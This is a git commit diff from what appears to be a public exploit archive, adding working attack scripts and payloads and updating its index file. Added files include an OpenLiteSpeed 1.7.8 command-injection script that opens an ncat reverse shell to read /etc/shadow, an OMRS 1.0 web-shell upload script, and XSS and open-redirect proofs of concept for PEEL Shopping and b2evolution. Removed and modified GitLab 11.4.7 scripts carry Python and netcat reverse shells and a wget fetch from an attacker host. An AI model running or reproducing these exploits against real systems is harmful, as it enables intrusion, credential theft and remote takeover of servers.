2021-02-12 05:01:57 +00:00 · 2021-02-12 05:01:57 +00:00 · b96bdbcfa5
commit b96bdbcfa5
parent fcdaf2028f
8 changed files with 287 additions and 273 deletions
--- a/exploits/multiple/webapps/49556.py
+++ b/exploits/multiple/webapps/49556.py
@ -0,0 +1,142 @@
+# Exploit Title: Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)
+# Date: 26/1/2021
+# Exploit Author: Metin Yunus Kandemir
+# Discovered by: cmOs - SunCSR
+# Vendor Homepage: https://openlitespeed.org/
+# Software Link: https://openlitespeed.org/kb/install-from-binary/
+# Version: 1.7.8
+
+import requests
+import sys
+import urllib3
+from bs4 import BeautifulSoup
+
+"""
+Description:
+The "path" parameter has command injection vulnerability that leads to escalate privilege.
+OpenLiteSpeed (1.7.8) web server runs with user(nobody):group(nogroup) privilege. However, extUser and
+extGroup parameters could be used to join a group (GID) such as shadow, sudo, etc.
+Details: https://github.com/litespeedtech/openlitespeed/issues/217
+Example:
+Step-1:
+ubuntu@ubuntu:~$ cat /etc/shadow
+cat: /etc/shadow: Permission denied
+Step-2:
+ubuntu@ubuntu:~$ nc -nvlp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Step-3:
+ubuntu@ubuntu:~/Desktop/exploits$ python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow
+[+] Authentication was successful!
+[+] Version is detected: OpenLiteSpeed 1.7.8
+[+] The target is vulnerable!
+[+] tk value is obtained: 0.98296300 1612966522
+[+] Sending reverse shell to 127.0.0.1:4444 ...
+[+] Triggering command execution...
+Step-4:
+ubuntu@ubuntu:~$ nc -nvlp 4444
+Listening on [0.0.0.0] (family 0, port 4444)
+Connection from 127.0.0.1 54534 received!
+cat /etc/shadow
+root:!:18620:0:99999:7:::
+daemon:*:17937:0:99999:7:::
+bin:*:17937:0:99999:7:::
+sys:*:17937:0:99999:7:::
+sync:*:17937:0:99999:7:::
+.
+.
+.
+"""
+
+def triggerCommandExec(target, s):
+    data = {"act" : "restart"}
+    trigger = s.post("https://"+target+"/view/serviceMgr.php", data = data, allow_redirects=False, verify=False)
+    if trigger.status_code == 200:
+        print("[+] Triggering command execution...")
+    else:
+        print("[-] Someting went wrong!")
+
+def commandExec(tk, groupId, s, target):
+    data = {
+        "name" : "lsphp",
+        "address" : "uds://tmp/lshttpd/lsphp.sock",
+        "note" : "",
+        "maxConns" : "10",
+        "env" : "PHP_LSAPI_CHILDREN=10",
+        "initTimeout" : "60",
+        "retryTimeout" : "0",
+        "persistConn" : "1",
+        "pcKeepAliveTimeout" : "",
+        "respBuffer" : "0",
+        "autoStart" : "2",
+        "path" : "/usr/bin/ncat -nv 127.0.0.1 4444 -e /bin/bash",
+        "backlog" : "100",
+        "instances" : "1",
+        "extUser" : "root",
+        "extGroup" : groupId ,
+        "umask" : "",
+        "runOnStartUp" : "1",
+        "extMaxIdleTime" : "",
+        "priority" : "0",
+        "memSoftLimit" : "2047M",
+        "memHardLimit" : "2047M",
+        "procSoftLimit" : "1400",
+        "procHardLimit" : "",
+        "a" : "s",
+        "m" : "serv",
+        "p" : "ext",
+        "t" : "A_EXT_LSAPI",
+        "r" : "lsphp",
+        "tk" : tk
+    }
+    exec = s.post("https://" + target + "/view/confMgr.php", data = data, allow_redirects=False, verify=False)
+
+    if exec.status_code == 200:
+        if exec.text == "Illegal entry point!":
+            print("[-] tk value is incorrect!")
+            sys.exit(1)
+        else:
+            print("[+] Sending reverse shell to 127.0.0.1:4444 ...")
+    else:
+        print("[-] Something went wrong!")
+        sys.exit(1)
+
+    triggerCommandExec(target, s)
+
+def loginReq(target, username, password, groupId):
+    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+    s = requests.Session()
+    data = {"userid" : username , "pass" : password }
+    login = s.post("https://" + target + "/login.php" , data = data, allow_redirects=False, verify=False)
+
+    if login.status_code == 302:
+        print("[+] Authentication was successful!")
+    elif login.status_code == 200:
+        print("[-] Authentication was unsuccessful!")
+        sys.exit(1)
+    else:
+        print("[-] Connection error!")
+        sys.exit(1)
+
+    version = s.get("https://" + target + "/index.php")
+    versionSource = BeautifulSoup(version.text, "html.parser")
+    v = versionSource.find('div', {'class':'project-context hidden-xs'}).text
+    print("[+] Version is detected: OpenLiteSpeed %s" %(v.split()[2]))
+    if v.split()[2] == "1.7.8":
+        print("[+] The target is vulnerable!")
+
+    #getting tk value
+    getTk = s.get("https://" + target + "/view/confMgr.php?m=serv&p=ext")
+    source = BeautifulSoup(getTk.text, 'html.parser')
+    tk = source.find('input', {'name':'tk'}).get('value')
+    print("[+] tk value is obtained: "+tk)
+    commandExec(tk, groupId, s, target)
+
+def main(args):
+    if len(args) != 5:
+        print("usage: %s targetIp:port username password groupId " %(args[0]))
+        print("Example: python3 openlitespeed.py 192.168.1.116:7080 admin MWE1ZmE2 shadow")
+        sys.exit(1)
+    loginReq(target=args[1], username=args[2], password=args[3], groupId=args[4])
+
+if __name__ == "__main__":
+    main(args=sys.argv)
--- a/exploits/php/webapps/49553.txt
+++ b/exploits/php/webapps/49553.txt
@ -0,0 +1,19 @@
+# Exploit Title: PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting
+# Date: 2021-02-11
+# Exploit Author: Anmol K Sachan
+# Vendor Homepage: https://www.peel.fr/
+# Software Link: https://sourceforge.net/projects/peel-shopping/
+# Software: : PEEL SHOPPING 9.3.0
+# Vulnerability Type: Stored Cross-site Scripting
+# Vulnerability: Stored XSS
+# Tested on Windows 10 XAMPP
+# This application is vulnerable to Stored XSS vulnerability.
+# Vulnerable script: http://localhost/peel-shopping_9_3_0/utilisateurs/change_params.php
+# Vulnerable parameters: 'Address'
+# Payload used: 
+
+jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
+)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
+
+# POC: in the same page where we injected payload click on the text box to edit the address.
+# You will see your Javascript code (XSS) executed.
--- a/exploits/php/webapps/49554.txt
+++ b/exploits/php/webapps/49554.txt
@ -0,0 +1,16 @@
+# Exploit Title: b2evolution 6.11.6 - 'redirect_to' Open Redirect
+# Date: 10/02/2021
+# Exploit Author: Soham Bakore, Nakul Ratti
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
+# Version: 6.11.6
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+# CVE : CVE-2020-22840
+
+
+--------------------------Proof of Concept-----------------------
+
+
+1. Send the following link : http://127.0.0.1/htsrv/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fgoogle.com to the unsuspecting user
+2. The user will be redirected to Google.com or any other attacker controlled domain
+3. This can be used to perform malicious phishing campaigns on unsuspecting users
--- a/exploits/php/webapps/49555.txt
+++ b/exploits/php/webapps/49555.txt
@ -0,0 +1,16 @@
+# Exploit Title: b2evolution 6.11.6 - 'tab3' Reflected XSS
+# CVE: CVE-2020-22839
+# Date: 10/02/2021
+# Exploit Author: Nakul Ratti, Soham Bakore
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/6-11-6-stable?download=12405
+# Version: 6.11.6
+# Tested on: latest version of Chrome, Firefox on Windows and Linux
+
+--------------------------Proof of Concept-----------------------
+
+Steps to Reproduce:
+
+1. Send the following URL http://HOST/evoadm.php?.ctrl=comments&filter=restore&tab3=123%22onmouseover=%22alert(document.domain)%22&blog=1&blog=1 to the logged in victim using any social engineering technique.
+2. When an unsuspecting user with high privileges opens this URL, XSS will be triggered  which will execute the malicious javascript payload in users browser.
+3. The vulnerable parameter in this case is “tab3”.
--- a/exploits/php/webapps/49557.py
+++ b/exploits/php/webapps/49557.py
@ -0,0 +1,79 @@
+# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)
+# Date: 10/02/2021
+# Exploit Author: Ricardo Ruiz (@ricardojoserf)
+# Vendor Homepage: https://phpgurukul.com/
+# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
+# Version: 1.0
+# Tested on: Windows 10/Xampp Server and Wamp Server
+# Porting an existing exploit (https://www.exploit-db.com/exploits/49260, for macOs) to Linux/Windows. Adding the possibility of automatic registration and execution of any command without needing to upload any local file
+# Example with registration:    python3 script.py -u http://172.16.1.102:80/ -c 'whoami' 
+# Example without registration: python3 script.py -u http://172.16.1.102:80/ -c 'whoami' -m 680123456 -p dante123 
+
+import os
+import sys
+import random
+import argparse
+import requests
+
+
+def get_args():
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', '--url', required=True, action='store', help='Url of Online Marriage Registration System (OMRS) 1.0')
+    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
+    parser.add_argument('-m', '--mobile', required=False, action='store', help='Mobile phone used for registration')
+    parser.add_argument('-p', '--password', required=False, action='store', help='Password used for registration')
+    my_args = parser.parse_args()
+    return my_args
+
+
+def login(url, mobile, password):
+    url = "%s/user/login.php"%(url)
+    payload = {'mobno':mobile, 'password':password, 'login':''}
+    req = requests.post(url, data=payload)
+    return req.cookies['PHPSESSID']
+
+
+def upload(url, cookie, file=None):
+    url = "%s/user/marriage-reg-form.php"%url
+    files = {'husimage': ('shell.php', "<?php $command = shell_exec($_REQUEST['cmd']); echo $command; ?>", 'application/x-php', {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
+    payload = {'dom':'05/01/2020','nofhusband':'omrs_rce', 'hreligion':'omrs_rce', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'omrs_rce','hzipcode':'omrs_rce','hstate':'omrs_rce','hadharno':'omrs_rce','nofwife':'omrs_rce','wreligion':'omrs_rce','wsbmarriage':'Bachelor','waddress':'omrs_rce','wzipcode':'omrs_rce','wstate':'omrs_rce','wadharno':'omrs_rce','witnessnamef':'omrs_rce','waddressfirst':'omrs_rce','witnessnames':'omrs_rce','waddresssec':'omrs_rce','witnessnamet':'omrs_rce','waddressthird':'omrs_rce','submit':''}
+    req = requests.post(url, data=payload, cookies={'PHPSESSID':cookie}, files=files)
+    print('[+] PHP shell uploaded')
+
+
+def get_remote_php_files(url):
+    url = "%s/user/images"%(url)
+    req = requests.get(url)
+    php_files = []
+    for i in req.text.split(".php"):
+        php_files.append(i[-42:])
+    return php_files
+
+
+def exec_command(url, webshell, command):
+    url_r = "%s/user/images/%s?cmd=%s"%(url, webshell, command)
+    req = requests.get(url_r)
+    print("[+] Command output\n%s"%(req.text))
+
+
+def register(mobile, password, url):
+    url_r = "%s/user/signup.php"%(url)
+    data = {"fname":"omrs_rce", "lname":"omrs_rce", "mobno":mobile, "address":"omrs_rce", "password":password, "submit":""}
+    req = requests.post(url_r, data=data)
+    print("[+] Registered with mobile phone %s and password '%s'"%(mobile,password))
+
+
+if __name__ == "__main__":
+    args = get_args()
+    url = args.url
+    command = args.command
+    mobile = str(random.randint(100000000,999999999)) if args.mobile is None else args.mobile
+    password = "dante123" if args.password is None else args.password
+    if args.password is None or args.mobile is None:
+        register(mobile,password,url)
+    cookie = login(url, mobile, password)
+    initial_php_files = get_remote_php_files(url)
+    upload(url, cookie)
+    final_php_files = get_remote_php_files(url)
+    webshell = (list(set(final_php_files) - set(initial_php_files))[0]+".php")
+    exec_command(url,webshell,command)
--- a/exploits/ruby/webapps/49263.py
+++ b/exploits/ruby/webapps/49263.py
@ -1,262 +0,0 @@
-# Exploit Title: GitLab 11.4.7 Authenticated Remote Code Execution (No Interaction Required)
-# Date: 15th December 2020
-# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
-# Software Link: https://about.gitlab.com/
-# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
-# Tested on: GitLab 11.4.7 CE
-# CVE : CVE-2018-19571 (SSRF),CVE-2018-19585 (CRLF)
-
-import requests
-import re
-import warnings
-from bs4 import BeautifulSoup
-import sys
-import base64
-import urllib
-from random_words import RandomWords
-import argparse
-import os
-import time
-
-
-
-
-parser = argparse.ArgumentParser(description='GitLab 11.4.7 Authenticated RCE')
-parser.add_argument('-U',help='GitLab Username')
-parser.add_argument('-P',help='Gitlab Password')
-parser.add_argument('-l',help='rev shell lhost')
-parser.add_argument('-p',help='rev shell lport ',type=int)
-args = parser.parse_args()
-
-
-username = args.U
-password = args.P
-lhost = args.l
-lport = args.p
-
-
-#Retrieve CSRF Token
-
-warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
-gitlab_url = "http://10.129.49.62:5080"
-request = requests.Session()
-print("[+] Retrieving CSRF token to submit the login form")
-time.sleep(1)
-page = request.get(gitlab_url+"/users/sign_in")
-html_content = page.text
-soup = BeautifulSoup(html_content,features="lxml")
-token = soup.findAll('meta')[16].get("content")
-
-
-print("[+] CSRF Token : "+token)
-time.sleep(1)
-
-
-#Login
-
-login_info ={
-            "authenticity_token": token,
-            "user[login]": username,
-            "user[password]": password,
-            "user[remember_me]": "0"
-}
-
-
-login_request = request.post(gitlab_url+"/users/sign_in",login_info)
-
-
-if login_request.status_code==200:
-	print("[+] Login Successful")
-	time.sleep(1)
-
-else:
-
-	print("Login Failed")
-	print(" ")
-	sys.exit()
-
-
-
-
-#Exploitation
-
-print("[+] Running Exploit")
-time.sleep(1)
-print("[+] Using IPV6 URL 'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/test/ssrf.git' to bypass filter")
-time.sleep(1)
-
-ipv6_url = "git%3A%2F%2F%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A6379%2Ftest%2Fssrf.git"
-
-
-r = RandomWords()
-project_name = r.random_word()
-project_url = '%s/%s/'%(gitlab_url,username)
-
-print("[+] Creating Project")
-time.sleep(1)
-print("[+] Project Name : "+project_name)
-time.sleep(1)
-
-print("[+] Creating Python Reverse Shell")
-time.sleep(1)
-
-
-python_shell = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%s));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'%(lhost,lport)
-
-
-os.system("touch shell.py")
-shell_file = open("shell.py","w")
-shell_file.write(python_shell)
-shell_file.close()
-
-
-print("[+] Reverse Shell Generated")
-time.sleep(1)
-
-print("[+] Start HTTP Server in current directory")
-
-
-print("Command : python3 -m http.server 80")
-time.sleep(2)
-
-http_server = raw_input("Continue (Y/N) : ")
-
-if (http_server=="N") or (http_server=="n"):
-	print("Start HTTP Server before running exploit")
-
-elif (http_server=="Y") or (http_server=="y"):
-
-	
-	
-	print("Run this script twice with options below to get SHELL!")
-	print("")
-	print("Option 1 : Download shell.py rev shell to server using wget")
-	print("Option 2 : Execute shell.py downloaded previously")
-
-	option = raw_input("Option (1/2) : ")
-
-
-	if option=="1":
-
-
-
-		reverse_shell= """\nmulti
-		 sadd resque:gitlab:queues system_hook_push
-		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid wget http://%s/shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
-		 exec
-		 exec
-		 exec\n""" %(lhost)
-		 
-		 
-		project_page = request.get(gitlab_url+"/projects/new")
-		html_content = project_page.text
-		soup = BeautifulSoup(html_content,features="lxml")
-		project_token = soup.findAll('meta')[16].get("content")
-		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
-		urlencoded_token1 = project_token.replace("==","%3D%3D")
-		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
-		
-
-		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
-
-
-
-
-
-
-		proxies = {
-			"http" : "http://127.0.0.1:8080",
-		     	"https" : "https://127.0.0.1:8080",
-			    }
-			    
-		cookies = {
-		    'sidebar_collapsed': 'false',
-		    'event_filter': 'all',
-		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
-		    '_gitlab_session':request.cookies['_gitlab_session'],
-		}
-
-		headers = {
-		    'Host': '10.129.49.31:5080',
-		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
-		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-		    'Accept-Language': 'en-US,en;q=0.5',
-		    'Accept-Encoding': 'gzip, deflate',
-		    'Referer': 'http://10.129.49.31:5080/projects',
-		    'Content-Type': 'application/x-www-form-urlencoded',
-		    'Content-Length': '398',
-		    'Connection': 'close',
-		    'Upgrade-Insecure-Requests': '1',
-		}
-
-
-
-		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
-
-		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
-		print("[+] Success!")
-		time.sleep(1)
-		print("[+] Run Exploit with Option 2")
-		
-		
-	elif option=="2":
-
-		reverse_shell= """\nmulti
-		 sadd resque:gitlab:queues system_hook_push
-		 lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|setsid python3 shell.py \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"
-		 exec
-		 exec
-		 exec\n"""
-		 
-
-
-
-		project_page = request.get(gitlab_url+"/projects/new")
-		html_content = project_page.text
-		soup = BeautifulSoup(html_content,features="lxml")
-		project_token = soup.findAll('meta')[16].get("content")
-		namespace_id = soup.find('input', {'name': 'project[namespace_id]'}).get('value')
-		urlencoded_token1 = project_token.replace("==","%3D%3D")
-		urlencoded_token_final = urlencoded_token1.replace("+","%2B")
-
-
-		payload=b"utf8=%E2%9C%93&authenticity_token={}&project%5Bimport_url%5D={}{}&project%5Bci_cd_only%5D=false&project%5Bname%5D={}&project%5Bnamespace_id%5D={}&project%5Bpath%5D={}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=0".format(urlencoded_token_final,ipv6_url,reverse_shell,project_name,namespace_id,project_name)
-
-
-
-
-
-
-		proxies = {
-			"http" : "http://127.0.0.1:8080",
-		     	"https" : "https://127.0.0.1:8080",
-			    }
-			    
-		cookies = {
-		    'sidebar_collapsed': 'false',
-		    'event_filter': 'all',
-		    'hide_auto_devops_implicitly_enabled_banner_1': 'false',
-		    '_gitlab_session':request.cookies['_gitlab_session'],
-		}
-
-		headers = {
-		    'Host': '10.129.49.31:5080',
-		    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
-		    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
-		    'Accept-Language': 'en-US,en;q=0.5',
-		    'Accept-Encoding': 'gzip, deflate',
-		    'Referer': 'http://10.129.49.31:5080/projects',
-		    'Content-Type': 'application/x-www-form-urlencoded',
-		    'Content-Length': '398',
-		    'Connection': 'close',
-		    'Upgrade-Insecure-Requests': '1',
-		}
-
-
-
-		#response = request.post('http://10.129.49.31:5080/projects',data=payload,proxies=proxies,cookies=cookies,headers=headers,verify=False)
-
-		response1 = request.post(gitlab_url+'/projects',data=payload,cookies=cookies,proxies=proxies,headers=headers,verify=False)
-		print("[+] Success!")
-		time.sleep(1)
-		print("[+] Spawning Reverse Shell")
--- a/exploits/ruby/webapps/49334.py
+++ b/exploits/ruby/webapps/49334.py
@ -1,10 +1,10 @@
-# Exploit Title: GitLab 11.4.7 - RCE (Authenticated)
+# Exploit Title: GitLab 11.4.7 RCE (POC)
 # Date: 24th December 2020
-# Exploit Author: Sam Redmond
+# Exploit Author: Norbert Hofmann
+# Original Exploit Authors: Sam Redmond, Tam Lai Yin
 # Software Link: https://gitlab.com/
 # Environment: GitLab 11.4.7, community edition
 # CVE: CVE-2018-19571 + CVE-2018-19585
-# Version: 11.4.7

 #!/usr/bin/python3

@ -26,7 +26,7 @@ username = args.u
 password = args.p
 gitlab_url = args.g + ":5080"
 local_ip = args.l
-local_port = args.p
+local_port = args.P

 session = requests.Session()

@ -56,7 +56,7 @@ print(f"[+] Creating project with random name: {project_name}")

 form = """\nmulti
    sadd resque:gitlab:queues system_hook_push
-    lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port}' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
+    lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\\'|""" + f'nc {local_ip} {local_port} -e /bin/bash' + """ \\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1608799993.1234567,\\"enqueued_at\\":1608799993.1234567}"
    exec
    exec
    exec\n"""
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -43231,7 +43231,7 @@ id,file,description,date,author,type,platform,port
 48549,exploits/java/webapps/48549.py,"VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution",2020-06-04,"Tomas Melicher",webapps,java,
 48550,exploits/php/webapps/48550.txt,"Navigate CMS 2.8.7 - Authenticated Directory Traversal",2020-06-04,"Gus Ralph",webapps,php,
 48551,exploits/hardware/webapps/48551.txt,"D-Link DIR-615 T1 20.10 - CAPTCHA Bypass",2020-06-04,"huzaifa hussain",webapps,hardware,
-48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution",2020-06-04,Enesdex,webapps,php,
+48552,exploits/php/webapps/48552.sh,"Online Marriage Registration System 1.0 - Remote Code Execution (1)",2020-06-04,Enesdex,webapps,php,
 48553,exploits/multiple/webapps/48553.txt,"Cayin Content Management Server 11.0 - Remote Command Injection (root)",2020-06-04,LiquidWorm,webapps,multiple,
 48554,exploits/hardware/webapps/48554.txt,"SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)",2020-06-04,LiquidWorm,webapps,hardware,
 48556,exploits/hardware/webapps/48556.txt,"Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read",2020-06-04,LiquidWorm,webapps,hardware,
@ -43524,11 +43524,10 @@ id,file,description,date,author,type,platform,port
 49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
 49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
 49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
-49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,
+49257,exploits/ruby/webapps/49257.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated) (1)",2020-12-14,"Fortunato Lodari",webapps,ruby,
 49258,exploits/php/webapps/49258.txt,"Task Management System 1.0 - 'page' Local File Inclusion",2020-12-15,"İsmail BOZKURT",webapps,php,
-49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)",2020-12-15,"Andrea Bruschi",webapps,php,
+49260,exploits/php/webapps/49260.py,"Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)",2020-12-15,"Andrea Bruschi",webapps,php,
 49262,exploits/hardware/webapps/49262.py,"Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)",2020-12-15,Freakyclown,webapps,hardware,
-49263,exploits/ruby/webapps/49263.py,"GitLab 11.4.7 - Remote Code Execution (Authenticated)",2020-12-16,"Mohin Paramasivam",webapps,ruby,
 49264,exploits/php/webapps/49264.txt,"Grav CMS 1.6.30 Admin Plugin 1.9.18 - 'Page Title' Persistent Cross-Site Scripting",2020-12-16,"Sagar Banwa",webapps,php,
 49265,exploits/linux/webapps/49265.txt,"Raysync 3.3.3.8 - RCE",2020-12-16,james,webapps,linux,
 49266,exploits/android/webapps/49266.py,"Magic Home Pro 1.5.1 - Authentication Bypass",2020-12-16,"Victor Hanna",webapps,android,
@ -43585,7 +43584,7 @@ id,file,description,date,author,type,platform,port
 49331,exploits/php/webapps/49331.txt,"Baby Care System 1.0 - 'roleid' SQL Injection",2020-12-23,"Vijay Sachdeva",webapps,php,
 49332,exploits/php/webapps/49332.txt,"WordPress Plugin Adning Advertising 1.5.5 - Arbitrary File Upload",2020-12-24,spacehen,webapps,php,
 49333,exploits/php/webapps/49333.txt,"WordPress Plugin WP-PostRatings 1.86 - 'postratings_image' Cross-Site Scripting",2020-12-24,"Park Won Seok",webapps,php,
-49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated)",2020-12-24,"Sam Redmond",webapps,ruby,
+49334,exploits/ruby/webapps/49334.py,"GitLab 11.4.7 - RCE (Authenticated) (2)",2020-12-24,"Norbert Hofmann",webapps,ruby,
 49338,exploits/php/webapps/49338.txt,"Wordpress Core 5.2.2 - 'post previews' XSS",2021-01-04,gx1,webapps,php,
 49339,exploits/php/webapps/49339.txt,"4images v1.7.11 - 'Profile Image' Stored Cross-Site Scripting",2021-01-04,"Ritesh Gohil",webapps,php,
 49340,exploits/php/webapps/49340.py,"Mantis Bug Tracker 2.24.3 - 'access' SQL Injection",2021-01-04,EthicalHCOP,webapps,php,
@ -43690,7 +43689,7 @@ id,file,description,date,author,type,platform,port
 49477,exploits/php/webapps/49477.txt,"Simple College Website 1.0 - 'full' Stored Cross Site Scripting",2021-01-26,"Marco Catalano",webapps,php,
 49478,exploits/hardware/webapps/49478.txt,"Tenda AC5 AC1200 Wireless - 'WiFi Name & Password' Stored Cross Site Scripting",2021-01-26,"Chiragh Arora",webapps,hardware,
 49479,exploits/java/webapps/49479.py,"Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated)",2021-01-26,CHackA0101,webapps,java,
-49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated)",2021-01-27,SunCSR,webapps,multiple,
+49483,exploits/multiple/webapps/49483.txt,"Openlitespeed Web Server 1.7.8 - Command Injection (Authenticated) (1)",2021-01-27,SunCSR,webapps,multiple,
 49481,exploits/ruby/webapps/49481.txt,"STVS ProVision 5.9.10 - File Disclosure (Authenticated)",2021-01-27,LiquidWorm,webapps,ruby,
 49482,exploits/ruby/webapps/49482.html,"STVS ProVision 5.9.10 - Cross-Site Request Forgery (Add Admin)",2021-01-27,LiquidWorm,webapps,ruby,
 49484,exploits/php/webapps/49484.txt,"EgavilanMedia PHPCRUD 1.0 - 'Full Name' Stored Cross Site Scripting",2021-01-28,"Mahendra Purbia",webapps,php,
@ -43742,3 +43741,8 @@ id,file,description,date,author,type,platform,port
 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
 49551,exploits/php/webapps/49551.txt,"b2evolution 6.11.6 - 'plugin name' Stored XSS",2021-02-10,"Soham Bakore",webapps,php,
 49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,
+49553,exploits/php/webapps/49553.txt,"PEEL Shopping 9.3.0 - 'address' Stored Cross-Site Scripting",2021-02-11,"Anmol K Sachan",webapps,php,
+49554,exploits/php/webapps/49554.txt,"b2evolution 6.11.6 - 'redirect_to' Open Redirect",2021-02-11,"Nakul Ratti",webapps,php,
+49555,exploits/php/webapps/49555.txt,"b2evolution 6.11.6 - 'tab3' Reflected XSS",2021-02-11,"Nakul Ratti",webapps,php,
+49556,exploits/multiple/webapps/49556.py,"Openlitespeed WebServer 1.7.8 - Command Injection (Authenticated) (2)",2021-02-11,"Metin Yunus Kandemir",webapps,multiple,
+49557,exploits/php/webapps/49557.py,"Online Marriage Registration System (OMRS) 1.0 - Remote code execution (3)",2021-02-11,"Ricardo Ruiz",webapps,php,